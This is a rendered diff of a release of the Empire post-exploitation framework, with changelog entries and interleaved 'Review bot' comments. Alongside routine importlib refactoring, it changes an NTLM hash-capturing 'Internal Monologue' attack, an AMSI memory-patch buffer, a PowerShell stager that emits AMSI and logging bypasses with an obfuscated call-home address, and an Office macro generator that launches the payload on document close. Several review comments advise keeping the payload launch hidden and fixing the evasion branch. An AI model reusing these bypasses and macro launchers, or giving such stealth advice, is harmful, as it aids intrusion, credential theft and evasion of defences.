New upstream version 3.1.4 Sophie Brun 4 years ago
21 changed file(s) with 70 addition(s) and 68 deletion(s). Raw diff Collapse all Expand all
4343
4444 Please see our [Releases](https://github.com/BC-SECURITY/Empire/releases) or [Changelog](/changelog) page for detailed release notes.
4545 ## Install
46 As of Empire 3.1.0, Empire only officially supports Python 3. If you still need Python 2 support, please use the [3.0.x branch](https://github.com/BC-SECURITY/Empire/tree/3.0.x) or releases. Also consider using our [Prebuilt Docker containers](#Docker) which use Python 3.
46 As of Empire 3.1.0, Empire only officially supports Python 3. If you still need Python 2 support, please use the [3.0.x branch](https://github.com/BC-SECURITY/Empire/tree/v3.0.7) or releases. Also consider using our [Prebuilt Docker containers](#Docker) which use Python 3.
4747
4848 __Note:__ Run ```./setup/reset.sh``` before starting Empire 3.1 for the first time.
4949 ### Kali
0 3.1.3
0 3.1.4
0 4/4/2020
1 ------------
2 - Version 3.1.4 Master Release
3 - Fixed non-ascii filename download error - #141 (@tyraniter)
4 - Updated payload evasion against Defender - #147 (@Hubbl3)
5 - Added reset flag to empire launcher - #147 (@Cx01N)
6 - Replaced imp package with importlib - #108 (@Cx01N)
7 - Fixed internal monologue issue with only running once - #43 (@Cx01N)
8 - Fixed ascii encode error in powerbreach modules - #150 (@CykuTW)
9
010 3/22/2020
111 ------------
212 - Version 3.1.3 Master Release
313 - Fixed errors with OneDrive listener - #40 (@Cx01N)
414 - Fixed REST API get config error - #131 (@chenxiangfang)
5 - Increased timer for stale agent checkins - #130 (@C01N)
15 - Increased timer for stale agent checkins - #130 (@Cx01N)
616
717 3/13/2020
818 ------------
1010 import http.server
1111 import zipfile
1212 import io
13 import imp
13 import importlib.util
14 import types
1415 import re
1516 import shutil
1617 import pwd
593594 def load_module(self, fullname):
594595 submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
595596 code = compile(source, fullpath, 'exec')
596 mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
597 mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))
597598 mod.__loader__ = self
598599 mod.__file__ = fullpath
599600 mod.__name__ = fullname
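Review bot: The module created on line 597 gets `__loader__`, `__file__` and `__name__` but no `__spec__`, which `types.ModuleType` does not set; since `importlib.util` is now imported at the top of this file, `mod.__spec__ = importlib.util.spec_from_loader(fullname, self, is_package=is_package)` would give it a proper spec (assuming the `is_package` value unpacked from `_get_source` is a bool, which is not visible here). Without a spec, `importlib.reload()` and tooling that inspects `__spec__` have to fall back to the finder. `sys.modules.setdefault` also keeps a previously registered module rather than the fresh one, so a repeat load re-executes into the existing module object; that matches the old `imp.new_module` behaviour but deserves a comment such as `# reuse an already-registered module so re-imports update it in place`. `load_module` continues past the end of this hunk.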
488488 }
489489 }
490490
491
491 if (authenticatedUsers.Count > 0)
492 {
493 authenticatedUsers.Clear();
494 }
492495 //Extended NetNTLM Downgrade and impersonation can only work if the current process is elevated
493496 if (IsElevated())
494497 {
536539 //If the process is not elevated, skip downgrade and impersonation and only perform an Internal Monologue Attack for the current user
537540 if (verbose == true) Console.WriteLine("Not elevated. Performing attack with current NTLM settings on current user");
538541 Console.WriteLine(InternalMonologueForCurrentUser(challenge));
539 }
542 }
540543 }
541544
542545 //This function performs an Internal Monologue Attack in the context of the current user and returns the NetNTLM response for the challenge 0x1122334455667788
639642 {
640643 result = ConvertHex(ByteArrayToString(user)) + "::" + ConvertHex(ByteArrayToString(domain)) + ":" + challenge + ":" + ByteArrayToString(nt_resp).Substring(0,32) + ":" + ByteArrayToString(nt_resp).Substring(32);
641644 }
642
645
643646 return result;
644647 }
645648
699702
700703 }
701704
702 return ascii;
705 return ascii;
703706 }
704707 }
705708
887890 [Console]::SetOut($OldConsoleOut)
888891 $Results = $StringWriter.ToString()
889892 $Results
890 }
893 }
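Review bot: The `Count > 0` guard added on lines 491–494 is redundant — `Clear()` on an empty collection is already a no-op — so the four lines reduce to `authenticatedUsers.Clear();`. This appears to be the fix for the "only runs once" issue in the changelog (state in the loaded assembly surviving between invocations in the same session), in which case a one-line comment saying why the collection is reset at entry, e.g. `// reset results left from a previous run in this session`, would help the next reader. The enclosing method starts before and ends after this hunk.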
14451445
14461446 generalGroup = parser.add_argument_group('General Options')
14471447 generalGroup.add_argument('--debug', nargs='?', const='1', help='Debug level for output (default of 1, 2 for msg display).')
1448 generalGroup.add_argument('--reset-empire', action='store_true', help="Resets Empire's database to defaults.")
14481449 generalGroup.add_argument('-v', '--version', action='store_true', help='Display current Empire version.')
14491450 generalGroup.add_argument('-r','--resource', nargs=1, help='Run the Empire commands in the specified resource file after startup.')
14501451
14721473 if args.version:
14731474 print(empire.VERSION)
14741475
1476 if args.reset_empire:
1477 subprocess.call("./setup/reset.sh")
1478
14751479 elif args.rest:
14761480 # start an Empire instance and RESTful API
14771481 main = empire.MainMenu(args=args)
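Review bot: Line 1476 opens a new `if` instead of extending the existing `if args.version: … elif args.rest:` chain, so `--version` now prints and then falls through into the `elif` chain; if that chain ends in an `else` that starts the normal CLI (not visible here), `./empire --version` will launch Empire. `elif args.reset_empire:` keeps the chain mutually exclusive as it was before. `subprocess.call("./setup/reset.sh")` also resolves relative to the current working directory and discards the exit status; `subprocess.check_call([os.path.join(os.path.dirname(os.path.abspath(__file__)), "setup", "reset.sh")])` fails loudly and does not depend on where the launcher was started from. The dispatch chain continues beyond the hunk.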
6363 [Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag, [Ref]$OldProtectFlag);
6464 $buf = [Byte[]]([UInt32]0xB8,[UInt32]0x57, [UInt32]0x00, [Uint32]0x07, [Uint32]0x80, [Uint32]0xC3);
6565
66 [system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6)
66 [system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6);
6767 """
6868 bypass = bypass.replace('"kernel32"', '`"kernel32`"')
6969 bypass = bypass.replace('@"','"')
1414 from builtins import str
1515 from builtins import range
1616
17 VERSION = "3.1.3 BC-Security Fork"
17 VERSION = "3.1.4 BC-Security Fork"
1818
1919 from pydispatch import dispatcher
2020
537537
538538 def do_uselistener(self, line):
539539 "Use an Empire listener module."
540 print("uselistener")
541540 parts = line.split(' ')
542541
543542 if parts[0] not in self.listeners.loadedListeners:
1010 from builtins import object
1111 import sys
1212 import fnmatch
13 import imp
13 import importlib.util
1414 from . import helpers
1515 import os
1616 import pickle
6464 listenerName = filePath.split("/lib/listeners/")[-1][0:-3]
6565
6666 # instantiate the listener module and save it to the internal cache
67 self.loadedListeners[listenerName] = imp.load_source(listenerName, filePath).Listener(self.mainMenu, [])
68
67 spec = importlib.util.spec_from_file_location(listenerName, filePath)
68 mod = importlib.util.module_from_spec(spec)
69 spec.loader.exec_module(mod)
70 self.loadedListeners[listenerName] = mod.Listener(self.mainMenu, [])
6971
7072 def set_listener_option(self, listenerName, option, value):
7173 """
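Review bot: `imp.load_source` registered the loaded module in `sys.modules` under `listenerName`; the `spec_from_file_location` / `module_from_spec` / `exec_module` sequence on lines 67–69 does not, so listener modules now exist only through the `Listener` instance kept in `loadedListeners`. Anything that resolves a class back to its module by name — `pickle` is imported in this file — will not find it, and a second load of the same name creates an unrelated module object. Adding `sys.modules[listenerName] = mod` before `spec.loader.exec_module(mod)` is the importlib-documented way to keep the old semantics (`sys` is already imported on line 11). Whether anything actually depends on the registration is not visible from this hunk, so confirm before relying on its absence.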
1111 from builtins import object
1212 import fnmatch
1313 import os
14 import imp
14 import importlib.util
1515 from . import messages
1616 from . import helpers
1717
5959 moduleName = "external/%s" %(moduleName)
6060
6161 # instantiate the module and save it to the internal cache
62 self.modules[moduleName] = imp.load_source(moduleName, filePath).Module(self.mainMenu, [])
63
62 spec = importlib.util.spec_from_file_location(moduleName, filePath)
63 mod = importlib.util.module_from_spec(spec)
64 spec.loader.exec_module(mod)
65 self.modules[moduleName] = mod.Module(self.mainMenu, [])
6466
6567 def reload_module(self, moduleToReload):
6668 """
8385 # check to make sure we've found the specific module
8486 if moduleName.lower() == moduleToReload.lower():
8587 # instantiate the module and save it to the internal cache
86 self.modules[moduleName] = imp.load_source(moduleName, filePath).Module(self.mainMenu, [])
87
88 spec = importlib.util.spec_from_file_location(moduleName, filePath)
89 mod = importlib.util.module_from_spec(spec)
90 spec.loader.exec_module(mod)
91 self.modules[moduleName] = mod.Module(self.mainMenu, [])
8892
8993 def search_modules(self, searchTerm):
9094 """
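Review bot: The same four-line load sequence is now duplicated in `load_modules` (lines 62–65) and `reload_module` (lines 88–91); a small private helper keeps the two paths from drifting and gives one place to add the `sys.modules` registration that `imp.load_source` used to do and this sequence does not. Note also that `reload_module` previously re-executed into the already-registered module object, whereas it now builds a fresh one each time — fine if nothing holds a reference to the old module, but worth a comment. Both enclosing methods start outside their hunks.

```python
def _load_module_from_file(self, moduleName, filePath):
    """Execute the Python source at filePath as a module named moduleName and return it."""
    spec = importlib.util.spec_from_file_location(moduleName, filePath)
    mod = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(mod)
    return mod

# … unchanged: directory walk in load_modules …
self.modules[moduleName] = self._load_module_from_file(moduleName, filePath).Module(self.mainMenu, [])
# … unchanged: name match in reload_module …
self.modules[moduleName] = self._load_module_from_file(moduleName, filePath).Module(self.mainMenu, [])
```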
164164 totalPacket = struct.pack('=H', 1)
165165 packetNum = struct.pack('=H', 1)
166166 resultID = struct.pack('=H', resultID)
167 length = struct.pack('=L', len(data))
167 length = struct.pack('=L', len(data.encode("UTF-8")))
168168 return taskType + totalPacket + packetNum + resultID + length + data.encode("UTF-8")
169169
170170 def parse_result_packet(packet, offset=0):
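Review bot: `data.encode("UTF-8")` is now evaluated twice — once for the length on line 167 and again in the return on line 168 — so the header length and the payload stay consistent only by coincidence of both calls agreeing; encoding once ties them together by construction: `encoded = data.encode("UTF-8")`, `length = struct.pack('=L', len(encoded))`, `return taskType + totalPacket + packetNum + resultID + length + encoded`. A short comment, e.g. `# length is the encoded byte count, not len(str), so non-ASCII data frames correctly`, records why the fix was needed. The enclosing function starts before the hunk.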
2222 from builtins import object
2323 from past.utils import old_div
2424 import fnmatch
25 import imp
25 import importlib.util
2626 from . import helpers
2727 import errno
2828 import os
7272 stagerName = filePath.split("/lib/stagers/")[-1][0:-3]
7373
7474 # instantiate the module and save it to the internal cache
75 self.stagers[stagerName] = imp.load_source(stagerName, filePath).Stager(self.mainMenu, [])
75 spec = importlib.util.spec_from_file_location(stagerName, filePath)
76 mod = importlib.util.module_from_spec(spec)
77 spec.loader.exec_module(mod)
78 self.stagers[stagerName] = mod.Stager(self.mainMenu, [])
7679
7780
7881 def set_stager_option(self, option, value):
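Review bot: Like the listener and module loaders changed in this commit, lines 75–77 no longer register the loaded stager module in `sys.modules`, which `imp.load_source` did; `sys.modules[stagerName] = mod` before `spec.loader.exec_module(mod)` restores that (`sys` is imported in this file). `spec_from_file_location` also returns `None` for a path whose suffix it does not recognise, which would surface here as an opaque `AttributeError` from `module_from_spec`; since `stagerName` is derived by stripping three characters the walk is presumably limited to `.py` files, but a one-line comment stating that assumption would help. The enclosing method starts before the hunk.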
318318 if safeChecks.lower() == 'true':
319319 stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
320320 # ScriptBlock Logging bypass
321 if scriptLogBypass:
322 stager += bypasses.scriptBlockLogBypass()
323 # @mattifestation's AMSI bypass
324 if AMSIBypass:
325 stager += bypasses.AMSIBypass()
326 # rastamouse AMSI bypass
327 if AMSIBypass2:
328 stager += bypasses.AMSIBypass2()
321 if scriptLogBypass:
322 stager += bypasses.scriptBlockLogBypass()
323 # @mattifestation's AMSI bypass
324 if AMSIBypass:
325 stager += bypasses.AMSIBypass()
326 # rastamouse AMSI bypass
327 if AMSIBypass2:
328 stager += bypasses.AMSIBypass2()
329 if safeChecks.lower() == 'true':
329330 stager += "};"
330331 stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
331
332
332333 stager += helpers.randomize_capitalization(
333334 "$" + helpers.generate_random_script_var_name("wc") + "=New-Object System.Net.WebClient;")
334335 if userAgent.lower() == 'default':
338339 if 'https' in host:
339340 # allow for self-signed certificates for https connections
340341 stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
341
342 stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
342343 if userAgent.lower() != 'none':
343344 stager += helpers.randomize_capitalization(
344345 "$" + helpers.generate_random_script_var_name("wc") + '.Headers.Add(')
397398 routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
398399 meta='STAGE0', additional='None', encData='')
399400 b64RoutingPacket = base64.b64encode(routingPacket)
400 stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
401
401402 # Add custom headers if any
402403 if customHeaders != []:
403404 for header in customHeaders:
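Review bot: Lines 321–328 now emit the ScriptBlock-logging and AMSI bypasses regardless of `safeChecks`, but the `If($PSVersionTable.PSVersion.Major -ge 3){` wrapper on line 319 and its closing `};` on line 330 are still gated on `safeChecks`, so with `safeChecks` false the bypasses run unguarded on any PowerShell version; if that is intended, a comment such as `# bypasses are always emitted; the PSVersion guard only wraps them when safeChecks is set` would spare the next reader the puzzle. `safeChecks.lower() == 'true'` is also evaluated twice — a single `safe_checks = safeChecks.lower() == 'true'` before line 318 reads better. The rendered page does not show indentation, so please confirm the relocated `$ser=…` line (342) sits at the same level as the `if 'https' in host:` block rather than inside it; otherwise `$ser` is only defined for https hosts. The enclosing function extends beyond both hunks.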
162162 return ""
163163 else:
164164 script = script.replace("REPLACE_LAUNCHER", stagerCode)
165 script = script.encode('ascii', 'ignore')
166
165
167166 for option,values in self.options.items():
168167 if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
169168 if values['Value'] and values['Value'] != '':
137137 return ""
138138 else:
139139 script = script.replace("REPLACE_LAUNCHER", stagerCode)
140 script = script.encode('ascii', 'ignore')
141
140
142141 for option,values in self.options.items():
143142 if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
144143 if values['Value'] and values['Value'] != '':
149149 return ""
150150 else:
151151 script = script.replace("REPLACE_LAUNCHER", stagerCode)
152 script = script.encode('ascii', 'ignore')
153152
154153 for option,values in self.options.items():
155154 if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
19891989 return data
19901990
19911991 cipher = triple_des(key, CBC, iv)
1992 # the line below is for pycrypto instead
1993 #cipher = DES3.new( key, DES3.MODE_CBC, iv )
19941992
19951993 plain = cipher.decrypt(data)
19961994
169169 for chunk in chunks[1:]:
170170 payload += "\t"+Str+" = "+Str+" + \"" + str(chunk) + "\"\n"
171171
172 macro = "Sub Auto_Open()\n"
173 macro += "\t"+Method+"\n"
174 macro += "End Sub\n\n"
175 macro += "Sub AutoOpen()\n"
176 macro += "\t"+Method+"\n"
177 macro += "End Sub\n\n"
178
179 macro += "Sub Document_Open()\n"
172 macro = "Sub AutoClose()\n"
180173 macro += "\t"+Method+"\n"
181174 macro += "End Sub\n\n"
182175
183176 macro += "Public Function "+Method+"() As Variant\n"
184 macro += "\tstrComputer = \".\"\n"
185 macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n"
177
186178 if OutlookEvasionBool == True:
187179 macro += "\tSet ID = objWMIService.ExecQuery(\"Select IdentifyingNumber from Win32_ComputerSystemproduct\")\n"
188180 macro += "\tFor Each objItem In ID\n"
195187 macro +="\tNext\n"
196188
197189 macro += payload
198 macro += "\tConst HIDDEN_WINDOW = 0\n"
199
200 macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n"
201 macro += "\tSet objConfig = objStartup.SpawnInstance_\n"
202 macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n"
203 macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n"
204 macro += "\tobjProcess.Create "+Str+", Null, objConfig, intProcessID\n"
190 macro += "\tSet asd = CreateObject(\"WScript.Shell\")\n"
191 macro += "\tasd.Run("+Str+")\n"
205192 macro += "End Function\n"
206193
207194 return macro
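Review bot: The `OutlookEvasionBool` branch on lines 178–180 still calls `objWMIService.ExecQuery(...)`, but the two lines that created that object (`strComputer = "."` and `Set objWMIService = GetObject("winmgmts:...")`, old lines 184–185) were removed, so with Outlook evasion enabled the generated macro fails with an undefined object at runtime. Either restore those two `macro +=` lines inside the `if OutlookEvasionBool == True:` block or drop the branch. Separately, `asd.Run(Str)` on line 191 uses WScript.Shell's default window style, whereas the removed `Win32_ProcessStartup` path set `ShowWindow = HIDDEN_WINDOW`; emitting `asd.Run Str, 0, False` keeps the launch hidden as before. The enclosing function starts before the hunk.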
1414 cryptography
1515 pyminifier
1616 xlutils
17 pycrypto
1817 pefile
1918 simplejson
2019 bcrypt
20 pycrypto
1414 cryptography
1515 pyminifier==2.1
1616 xlutils
17 pefile
1718 pycrypto
18 pefile
3131 then
3232 rm -rf ./downloads/
3333 fi
34
35 # start up Empire if not in docker otherwise return
36 if [ -f /.dockerenv ]; then
37 echo " [*] Empire reset complete returning back to Docker"
38 else
39 ./empire
40 fi
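Review bot: Ending reset.sh with `./empire` means the script now launches Empire itself; combined with the new `--reset-empire` flag in this same commit, which calls this script from inside the launcher, `./empire --reset-empire` ends up running a second Empire process nested under the first until the child exits. Leaving the launch to the caller, or at least using `exec ./empire` so the shell is replaced rather than kept as a parent, avoids that; a comment recording which entry point is expected to start Empire would help either way. `/.dockerenv` is specific to Docker, so the "return to Docker" branch will not trigger under other container runtimes — worth stating in the comment on line 35.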